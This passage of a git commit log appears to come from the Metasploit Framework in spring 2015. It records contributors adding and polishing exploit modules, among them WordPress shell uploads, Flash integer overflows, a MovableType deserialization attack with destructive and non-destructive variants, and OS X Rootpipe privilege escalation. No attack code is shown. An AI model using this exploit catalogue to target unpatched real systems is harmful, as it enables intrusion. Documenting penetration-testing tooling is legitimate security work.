looking at the payload sizes were being told there was no size. In the
case of the meterpreter payloads, this was causing issues with the proxy
settings because the proxy configuration detail isn't added to the
payload unless there's enough space.
This fix adds a default size of 2048 (the same as the plain psexec
module). This makes the proxy settings work as expected.
2015-05-19 22:11:29 +10:00
89be3fc1f2
Do global requirement comparison in BAP
2015-05-18 16:27:18 -05:00
d99eedb1e4
Adding begin...ensure block
2015-05-17 20:48:11 +02:00
acb053a2a7
CloseHandle cleanup
2015-05-17 20:39:10 +02:00
2882374582
Land #5276 , @lanjelot fixes #4243 and improves java_jdwp_debugger
2015-05-15 11:12:10 -05:00
a46975f1f0
Fix read_reply to use get_once correctly
2015-05-15 11:11:25 -05:00
e075495a5b
string concatenation, clear \ handling
2015-05-15 06:51:42 +02:00
94d39c5c75
remove hard coded pipe name
2015-05-15 06:35:55 +02:00
bb4f5da6d9
replace client.sys.config.getenv with get_env
2015-05-15 06:33:57 +02:00
8bcdd08f34
Some basic code in place for real-time exploit list generation
2015-05-14 19:09:38 -05:00
bba261a1cf
Initial version
2015-05-15 00:36:03 +02:00
1a8ab91ce3
Configurable max exploits
2015-05-13 16:23:22 -05:00
7617217eff
Add ability to exclude
2015-05-13 15:55:19 -05:00
0fb21af247
Verify deletion at on_new_session moment
2015-05-11 18:56:18 -05:00
30b1c508f1
javascript portion
2015-05-10 16:50:32 -05:00
eeb87a3489
Polish up module
2015-05-09 14:33:41 -05:00
fe907dfe98
Fix the disclosure date
2015-05-09 10:44:28 -05:00
cb51bcc776
Land #5147 , @lightsey's exploit for CVE-2015-1592 MovableType deserialization
2015-05-09 01:56:38 -05:00
89bc405c54
Do minor code cleanup
2015-05-09 01:54:05 -05:00
8e86a92210
Update
2015-05-08 00:25:34 -05:00
71518ef613
Land #5303 , metasploit-payloads Java binaries
2015-05-07 22:39:54 -05:00
2f2169af90
Use single quotes consistently
2015-05-07 22:39:36 -05:00
95f087ffd3
Some progress
2015-05-07 19:26:38 -05:00
51bb4b5a9b
Add module for CVE-2015-0359
2015-05-07 17:00:00 -05:00
a066105a86
prefer reading directly with MetasploitPayloads where possible
2015-05-07 16:59:02 -05:00
134a674ef3
Land #5312 , @todb-r7's release fixes
2015-05-07 15:34:31 -05:00
1469a151ad
Land #5290 , Wordpress RevSlider Module
2015-05-07 22:15:56 +02:00
f423306b6f
Various post-commit fixups
...
Edited modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb first landed
in #5150 , @wchen-r7's DOS module for CVE-2015-1635 HTTP.sys
Edited modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb
first landed in #5192 , @joevennix's module for Safari CVE-2015-1126
Edited modules/auxiliary/gather/java_rmi_registry.rb first landed in
Edited modules/auxiliary/gather/ssllabs_scan.rb first landed in #5016 ,
add SSL Labs scanner
Edited modules/auxiliary/scanner/http/goahead_traversal.rb first landed
in #5101 , Add Directory Traversal for GoAhead Web Server
Edited modules/auxiliary/scanner/http/owa_iis_internal_ip.rb first
landed in #5158 , OWA internal IP disclosure scanner
Edited modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb
first landed in #5159 , WordPress Mobile Edition Plugin File Read Vuln
Edited modules/exploits/linux/http/multi_ncc_ping_exec.rb first landed
in #4924 , @m-1-k-3's DLink CVE-2015-1187 exploit
Edited modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb first
landed in #5131 , WordPress Slideshow Upload
Edited modules/exploits/windows/local/run_as.rb first landed in #4649 ,
improve post/windows/manage/run_as and as an exploit
(These results courtesy of a delightful git alias, here:
```
cleanup-prs = !"for i in `git status | grep modules | sed
s/#.*modules/modules/`; do echo -n \"Edited $i first landed in \" && git
log --oneline --first-parent $i | tail -1 | sed 's/.*Land //' && echo
''; done"
```
So that's kind of fun.
2015-05-06 11:39:15 -05:00
b8c7161819
Fix up NameError'd payload_exe
2015-05-06 11:34:05 -05:00
59ffe5d98f
Land #5306 , payload_exe NameError fix
2015-05-06 11:29:29 -05:00
4b0f54f0aa
Land #5305 , CVE-2015-0336 Flash NetConnection Type Confusion
2015-05-06 11:26:22 -05:00
97807e09ca
Lad #5125 , Group Policy startup exploit
2015-05-06 11:17:01 -05:00
5b57e4e9ca
Add info about the waiting time
2015-05-06 11:15:11 -05:00
94d1905fd6
Added WPVDB reference
...
Added a link to the new WPVDB article 7540 that @FireFart provided.
2015-05-06 05:41:02 -05:00
c293066198
Leverage check_version_from_custom_file in PR #5292
...
Change the 'check' code to leverage check_version_from_custom_file added to wordpress/version.rb by @FireFart in PR #5292
2015-05-06 05:41:02 -05:00
18697d8d02
Fixed the following based on feedback from @FireFart ( Thanks! )
...
- Adjusted references section
- Corrected call to normalize_uri
- Removed unnecessary require for rex/zip
2015-05-06 05:41:02 -05:00
8cb18f8afe
Initial commit of code
2015-05-06 05:41:02 -05:00
5cb8b9a20a
Fix #5304
2015-05-05 22:25:06 -04:00
582919acac
Add module for CVE-2015-0336
2015-05-05 17:25:19 -05:00
a0c806c213
Update java meterpreter and payload references to use metasploit-payloads
2015-05-05 15:01:00 -05:00
c988447c18
title enhancement, OSVDB ref
...
touch up title and add OSVDB reference
2015-05-05 13:21:36 -06:00
c8123c147f
upnp vs hnap
2015-05-05 20:57:05 +02:00
73f7885eea
add comment
2015-05-29 23:08:55 +02:00
b95be1b25f
Support information to include logon scripts
2015-05-04 15:49:19 -05:00
dc42a3ee1a
add OSVDB ref
...
add OSVDB ref
2015-05-04 14:27:44 -06:00
c7e05448e7
various MIPS vs MIPSBE fixes
2015-05-04 12:55:21 +02:00
67a23f2c74
Land #5296 , info hash product name fix
2015-05-03 14:36:25 -05:00
4bfb9262e6
Add exploit module for MovableType CVE-2015-1592
...
This module targets the deserialization of untrusted Storable data in
MovableType before 5.2.12 and 6.0.7. The destructive attack will
function on most installations, but will leave the webapp corrupted.
The non-destructive attack will only function on servers that have the
Object::MultiType (uncommon) and DateTime (common) Perl modules
installed in addition to MovableType.
2015-05-03 14:18:01 -05:00
a5c10b7f10
Fix product name
...
Product name missing a letter in two locations
2015-05-03 13:11:22 -06:00
53043dcbbc
make msftidy happy
2015-05-03 18:14:51 +02:00
6fbce56a52
realtek upnp command injection
2015-05-03 18:09:22 +02:00
db999d2c62
Remove ff 31-34 exploit from autopwn, requires interaction.
2015-05-03 10:42:21 -05:00
1bc6822811
Delete Airties module
2015-05-22 11:57:45 -05:00
70d0bb1b1a
Merge Airties target inside miniupnpd_soap_bof
2015-05-22 11:57:19 -05:00
a531ad9ec2
Land #5096 , @pedrib's exploit for Novell ZCM CVE-2015-0779
2015-05-01 14:35:28 -05:00
0ff33572a7
Fix waiting loop
2015-05-01 14:34:43 -05:00
645f239d94
Change module filename
2015-05-01 14:18:34 -05:00
11a3f59b0b
Return false if there isn't a positive answer
2015-05-01 14:06:57 -05:00
093c2e3ace
Do minor style cleanup
2015-05-01 13:56:48 -05:00
d38adef5cc
Make TOMCAT_PATH optional
2015-05-01 13:54:39 -05:00
d2a7d83f71
Avoid long sleep times
2015-05-01 13:51:52 -05:00
8fcf0c558d
Use single quotes
2015-05-01 13:20:27 -05:00
08b5f71f99
More options
2015-04-30 19:09:08 -05:00
5ae06310b6
Do some option handling
2015-04-30 18:59:44 -05:00
aa59b3acc6
title enhancement, description touch-up
...
Expanded title to be more precise and standardized use of vendor name
2015-04-30 17:23:15 -06:00
89d026c900
Fix merge conflict
2015-04-30 12:33:45 -05:00
5ab9f01eee
Use byte[] so it works even if Base64 unavailable
2015-04-30 12:46:14 +10:00
15bb4d1ea4
Fix #4243 , regression introduced by commit 6e80481384
2015-04-30 12:42:39 +10:00
ca32db3e23
Merge branch 'upstream-master' into BAPv2
2015-04-29 18:53:37 -05:00
d773f85dca
Add reference to malware
2015-04-29 17:53:29 -05:00
dbba466b5b
Add module for CVE-2014-8440
2015-04-29 17:52:04 -05:00
5defb50252
Fix #5267 , references fixes
2015-04-29 14:21:23 -05:00
a4531e62a0
Clean up references
2015-04-29 14:21:08 -05:00
b2d08251e4
Move reference
2015-04-29 14:18:45 -05:00
fd567195e3
Fix punctuation and missing comma
2015-04-29 14:12:44 -05:00
5f0736fa4c
enhance title and description, add OSVDB reference, standardized JBoss
2015-04-29 11:39:40 -06:00
65b7659d27
Some progress
2015-04-29 01:01:36 -05:00
43492b7c67
Some progress
2015-04-28 18:17:32 -05:00
c01fc829ab
Title enhancement, OSVDB refs
2015-04-28 15:56:34 -06:00
d8b8017e0b
remove debugging
2015-04-27 06:36:34 +02:00
8db88994ac
fingerprint, title
2015-04-27 06:34:46 +02:00
285d767e20
initial commit of UPnP exploit for Airties devices
2015-04-27 05:34:30 +02:00
b537c8ae2c
Changed fail_with output.
2015-04-26 01:28:55 -03:00
a4b4d7cf6a
Add WordPress Front-end Editor File Upload Vuln
2015-04-25 22:00:05 -03:00
ff96101dba
Land #5218 , fix #3816 , remove print_debug / DEBUG
2015-04-24 13:41:07 -05:00
7167dc1147
Land #5243 , @espreto's WordPress WPshop eCommerce File Upload exploit
2015-04-24 11:30:28 -05:00
558103b25d
Do code cleanup
2015-04-24 11:30:08 -05:00
8a8d9a26f4
Do code cleanup
2015-04-24 10:47:46 -05:00
b5223912cb
Fix check method
2015-04-24 10:41:41 -05:00
c9b4a272e3
Changed fail_with output.
2015-04-24 12:16:23 -03:00
e14c6af194
Removed double 'Calling payload'.
2015-04-24 06:26:04 -03:00
01efc97c4a
Add WordPress WPshop eCommerce File Upload.
2015-04-24 06:21:49 -03:00
5bf4c9187a
Removed double "Calling payload..."
2015-04-23 03:41:34 -03:00
844f768eee
Add WordPress InBoundio Marketing File Upload
2015-04-23 03:32:17 -03:00
f5b0a7e082
include rop gadget description
2015-04-23 00:11:02 +02:00
1ec0e09a43
msftidy
2015-04-22 10:32:47 +02:00
58099d0469
airties login bof module
2015-04-22 10:21:58 +02:00
92c91c76f7
Proftpd 1.3.5 Mod_Copy Command Execution
2015-04-22 01:41:16 -04:00
3f40342ac5
Fix sock_sendpage
2015-04-21 14:17:19 -05:00
ab94f15a60
Take care of modules using the 'DEBUG' option
2015-04-21 12:13:40 -05:00
4224008709
Delete print_debug/vprint_debug
2015-04-21 11:14:03 -05:00
4f59abe842
Land #5203 , @Meatballs1 fixes #5199 by using the correct namespace
...
* Fixes web_delivery
2015-04-20 11:20:48 -05:00
eb1c01417a
Bogus :
2015-04-20 11:00:26 +01:00
aa4f913800
Resolves #5199
...
Fix Powershell namespace in web_delivery module
2015-04-20 09:37:42 +01:00
a60fe4af8e
Land #5201 , Change module wording to conform with other WP modules
2015-04-20 10:07:05 +02:00
1a32cf7fc0
Change module wording to conform with other WP modules.
2015-04-20 16:48:35 +10:00
a5583debdc
Land #5131 , WordPress Slideshow Upload
2015-04-19 23:12:26 +02:00
c1a1143377
Remove line in description and output line in fail_with
2015-04-18 15:38:42 -03:00
b991dec0f9
Dlink UPnP SOAP-Header Injection
2015-04-17 22:54:32 +02:00
4f903a604c
Fix #5103 , Revert unwanted URI encoding
...
Fix #5103 . By default, Httpclient will encode the URI but
we don't necessarily want that. These modules originally
didn't use URI encoding when they were written so we should
just keep them that way.
2015-04-17 13:59:49 -05:00
bba0927c7e
Land #5163 , WordPress Reflex Gallery Plugin File Upload
2015-04-17 11:26:34 +02:00
3927024f79
Land #5154 , CVE-2015-0556 (Flash copyPixelsToByteArray int overflow)
...
sage aborts
2015-04-16 21:21:09 -05:00
153344a1dd
fix Unkown typo
2015-04-16 23:59:28 +02:00
33cf2f1578
Added Faliure:: symbol to fail_with
2015-04-16 17:40:25 -03:00
2138325129
Add Failure:: symbol to fail_with
2015-04-16 17:15:24 -03:00
352e170624
more failure reasons
2015-04-16 22:04:11 +02:00
8c5890d506
more fixes
2015-04-16 21:56:42 +02:00
ba6548db75
be consistent about naming
2015-04-16 21:44:56 +02:00
b4b8ac0849
moar fail_with's
2015-04-16 21:26:37 +02:00
a193ae42b0
moar fail_with's
2015-04-16 21:25:05 +02:00
4dc402fd3c
moar fail_with's
2015-04-16 21:16:52 +02:00
0e186fa617
first fail_with fixes
2015-04-16 21:08:33 +02:00
f0d6735332
Land #5165 , version number correction
2015-04-16 12:10:12 -05:00
26f2b350d2
Land #5168 , more fail_with fixes
2015-04-16 12:04:55 -05:00
904339f0d7
Fix #5130 , Correct use of fail_with in wp_worktheflow_upload.rb
2015-04-16 10:32:50 -05:00
5c98270f4d
Fix #5137 - Correct use of fail_with
2015-04-16 09:57:02 -05:00
418d8586a5
Land #5137 (again), WordPress N-Media Website File Upload
2015-04-16 16:24:41 +02:00
7f79acb996
Land #5137 , WordPress N-Media Website File Upload
2015-04-16 16:17:20 +02:00
517ad54617
Fix the correct version in check.
2015-04-16 10:56:43 -03:00
95310dbe4f
Fix 'if' condition.
2015-04-16 10:51:36 -03:00
626a9f0508
Fix the correct version in check.
2015-04-16 10:46:08 -03:00
6ef074cd28
Fix the correct version in check
2015-04-16 10:34:34 -03:00
d9f4c7548f
Land #5136 , WordPress Creative Contact Form upload
2015-04-16 15:17:14 +02:00
84c74b8d42
use correct version number
2015-04-16 15:01:54 +02:00
ee8dc49a25
Fix wrong version in check.
2015-04-16 09:45:18 -03:00
e16cc6fa82
Fix the correct version in check.
2015-04-16 09:38:42 -03:00
7dde7f6f7c
Land #5130 , WordPress WorkTheFlow Upload
2015-04-16 14:06:37 +02:00
dc7f161339
Add author, EDB, OSVDB and WPVDB.
2015-04-16 08:56:33 -03:00
1112a3b0ae
Add WordPress Reflex Gallery Plugin File Upload
2015-04-16 08:40:51 -03:00
4aa4f83372
Removed timeout 2.
2015-04-16 05:37:11 -03:00
39556c10c7
Rewrote check method.
2015-04-16 05:36:20 -03:00
ace316a54f
Added WPVDB and EDB references.
2015-04-16 05:29:21 -03:00
10c218319a
Rewrote response condition.
2015-04-16 05:26:48 -03:00
5cb9b1a44c
Removed timeout 2.
2015-04-16 05:21:59 -03:00
0e1b173d15
Renamed USER/PASSWORD to WP_USER/WP_PASSWORD.
2015-04-16 05:11:56 -03:00
13ded8abe7
Added WPVDB.
2015-04-16 05:08:45 -03:00
64923ffdc2
Fixed plugin name in check method
2015-04-16 05:06:36 -03:00
e9212c4d6b
wordpress_url_admin_ajax intead of wordpress_url_backend
2015-04-16 04:53:05 -03:00
81d898fd7e
Rewrote check code.
2015-04-16 04:51:40 -03:00
aeb0484889
Removed timeout 2.
2015-04-16 04:48:00 -03:00
e6e9c173e3
Rewrote res conditions.
2015-04-16 04:43:34 -03:00
d11db4edc7
Rewrote check code.
2015-04-16 04:37:30 -03:00
f13d31c7c2
Added WPVDB.
2015-04-16 04:31:23 -03:00
cccda4e851
Removed unnecessary line.
2015-04-16 04:27:15 -03:00
d3a6de761d
Removed timeout 2.
2015-04-16 04:09:02 -03:00
01625e3bba
Land #5148 , DRY BSD/OS X shellcode
...
Also fix a semi-regression in the Rootpipe exploit.
2015-04-16 02:08:18 -05:00
13da15e434
Add default PAYLOAD again
...
PrependSetreuid doesn't work with generic/shell_reverse_tcp.
2015-04-16 02:07:02 -05:00
1249f29ee8
Add JSON::ParserError exception handler.
2015-04-16 04:03:54 -03:00
c1753672bf
Delete file_contents initialization
2015-04-15 17:58:32 -05:00
28fac60c81
Add module for CVE-2015-0556
2015-04-15 14:08:16 -05:00
ef6bf54e2f
Fix metadata
2015-04-15 09:22:59 -05:00
1da6b32df7
Land #4924 , @m-1-k-3's DLink CVE-2015-1187 exploit
...
* ncc service ping.cpp command injection
2015-04-15 09:17:10 -05:00
6019bbe0d2
Add ranking comment
2015-04-15 09:12:03 -05:00
ad465c4d5b
Do code cleanup
2015-04-15 09:10:18 -05:00
b5335ab266
Some progress, mostly documentation
2015-04-14 19:03:08 -05:00
aca93cc86e
Add missing Rank
2015-04-14 13:33:37 -05:00
6c9cc7c725
Some progress
2015-04-14 13:30:34 -05:00
4486831ba3
Module loading portion
2015-04-14 01:33:02 -05:00
e114c85044
Land #5127 , x64 OS X prepend stubs 'n' stuff
2015-04-14 01:25:39 -05:00
a09e643a71
Add author, URL, WPVDB and disclosure date.
2015-04-13 22:54:05 -03:00
271a81778e
Add Module WP N-Media Website Contact Form Upload
2015-04-13 22:48:34 -03:00
7f10fb5bf0
Fix disclosure date
2015-04-13 18:53:20 -03:00
e94ca0bdd1
Add EDB, OSVDB and author.
2015-04-13 18:42:17 -03:00
d5d975c450
Add Module WordPress Creative Contact Form Upload
2015-04-13 18:38:43 -03:00
e324819feb
Add Privileged to info hash
...
Also remove default payload. Was set for CMD.
2015-04-13 15:23:30 -05:00
bd3b6514fa
Dubbed. Whump whump.
2015-04-13 10:52:32 -05:00
d87483b28d
Squashed commit of the following:
...
commit 49f480af8b9d27e676c02006ae8873a119e1aae6
Author: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Mon Apr 13 10:42:13 2015 -0500
Fix funny punctuation on rootpipe exploit title
See #5119
commit 0b439671efd6dabcf1a69fd0b089c28badf5ccff
Author: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Mon Apr 13 10:37:39 2015 -0500
Fix vendor caps
Trusting the github repo README at
https://github.com/embedthis/goahead
See #5101
2015-04-13 10:46:47 -05:00
7b57496501
Fix typo and add email addr.
2015-04-13 04:12:32 -03:00
abee3f17c4
Add author, CVE and EDB references
2015-04-13 04:08:34 -03:00
58c4042321
Add Module WP Slideshow Gallery Shell Upload
2015-04-13 03:56:59 -03:00
2d1f8c510e
Add author and references
2015-04-12 21:21:49 -03:00
9f06cee53d
Add Module WordPress WorkTheFlow Shell Upload
2015-04-12 21:09:44 -03:00
c132a3fb0a
Fix OSX prepends and implement x64 setreuid.
2015-04-11 20:04:21 -05:00
656abac13c
Use keyword arguments
2015-04-10 18:03:45 -05:00
1720d4cd83
Introduce get_file_contents
2015-04-10 17:34:00 -05:00
ca6a5cad17
support changing files
2015-04-10 16:53:12 -05:00
b2e17a61a9
Fix disclosure date
2015-04-10 13:09:24 -05:00
ab944b1897
Add module to exploit dangerous group policy startup scripts
2015-04-10 13:01:50 -05:00
3313dac30f
Land #5119 , @wvu's addition of the OSX rootpipe privesc exploit.
...
orts
borts
2015-04-10 12:38:25 -05:00
4419c1c728
Land #5120 , Adobe Flash Player casi32 Integer Overflow
2015-04-10 12:18:11 -05:00
fc814a17ae
Add admin check
...
Also break out version check.
2015-04-10 11:24:49 -05:00
41885133d8
Refactor and clean
...
Finally breaking free of some stubborn old habits. :)
2015-04-10 11:22:27 -05:00
a7601c1b9a
Use zsh to avoid dropping privs
...
Also add some configurable options.
2015-04-10 11:22:00 -05:00
4cc6ac6eaa
Clarify vulnerable versions
2015-04-10 11:22:00 -05:00
c4b7b32745
Add Rootpipe exploit
2015-04-10 11:22:00 -05:00
c6f062d49e
Ensure that local variable `upload_path` is defined
...
Merge `upload_payload` and `parse_upload_response` so that the
`upload_path` variable is defined for use in error messages in the event
of failure.
2015-04-10 10:58:20 +01:00
91f5d0af5a
Add module for CVE-2014-0569
...
* Adobe flash, Integer overflow on casi32
2015-04-09 19:37:26 -05:00
4808d61af3
Add OSVDB id and full disclosure URL
2015-04-09 16:32:22 +01:00
e03f2df691
Land #5002 , RMI/JMX improvements
2015-04-08 15:23:29 -05:00
cf8b92b747
Create zcm_file_upload.rb
2015-04-07 16:05:51 +01:00
7a2d3f5ebd
Land #5082 , firefox_proxy_prototype autopwn_info
2015-04-06 13:36:03 -05:00
e1af495d21
Add extra release fixes
2015-04-06 13:08:40 -05:00
b62011121b
Minor word choice fix on Solarwinds exploit
...
Removing the second person pronoun usage.
[See #5050 ]
2015-04-06 12:40:22 -05:00
William Vu
wchen-r7
h00die
jvazquez-r7
Mo Sadek
Tod Beardsley
xistence
Michael Messner
HD Moore
joev
Ben Lincoln
Donny Maasland
Daniel Jensen
aos
Spencer McIntyre
OJ
Pedro Ribeiro
g0tmi1k
0xFFFFFF
James Lee
Hans-Martin Münch (h0ng10)
Brent Cook
Christian Mehlmauer
Tom Sellers
Sam Roth
Darius Freamon
m-1-k-3
John Lightsey
lanjelot
Roberto Soares
Meatballs
aushack
Jon Cave